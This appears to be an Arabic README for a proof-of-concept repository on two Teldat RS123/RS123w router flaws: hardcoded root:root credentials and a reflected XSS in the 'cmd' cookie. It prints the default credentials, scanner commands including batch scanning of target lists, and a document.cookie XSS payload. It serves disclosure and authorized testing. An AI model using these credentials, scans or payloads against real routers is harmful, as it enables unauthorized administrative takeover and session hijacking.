
POC لـ CVE-2022-39996 (XSS المنعكسة) وCVE-2022-39997 (كلمة مرور ضعيفة) في جهاز التوجيه Teldat RS123/RS123w
إثبات المفهوم لثغرتين تم اكتشافهما في راوترات Teldat RS123 / RS123w.
| معرّف CVE | النوع | CWE | CVSS | الخطورة |
|---|---|---|---|---|
| CVE-2022-39996 | XSS انعكاسي | CWE-79 | 6.1 | متوسطة |
| CVE-2022-39997 | كلمة مرور ضعيفة | CWE-521 | 9.8 | حرجة |
المنتج المتأثر: راوتر Teldat RS123, RS123w
تأتي راوترات Teldat RS123/RS123w مع بيانات اعتماد افتراضية مضمّنة في الكود root:root. غالبًا ما يترك المسؤولون هذه البيانات دون تغيير، مما يسمح للمهاجمين بدون مصادقة بالحصول على وصول إداري كامل عبر Telnet أو SSH أو HTTP أو خدمات أخرى.
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
يعكس مسار /upgrade/index.html قيمة ملف تعريف الارتباط cmd الخاص بـ HTTP في الاستجابة دون تعقيم. يمكن للمهاجم إنشاء طلب خبيث يحتوي على JavaScript في ملف تعريف الارتباط cmd. عندما يزور مسؤول مصادق الصفحة، يُنفَّذ السكربت في سياق متصفح واجهة الويب الخاصة بالراوتر، مما يتيح اختطاف الجلسة أو التلاعب بالإعدادات.
cmd:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| الملف | الوصف |
|---|---|
CVE-2022-39997.py | كشف كلمة المرور الضعيفة (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | كشف XSS الانعكاسي عبر ملف تعريف الارتباط cmd |
Teldat's Router Vulnerability.md | تقرير كامل بالإفصاح عن الثغرة |
سكربتات إثبات المفهوم هذه مخصّصة لأغراض التعليم والاختبار الأمني المصرح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.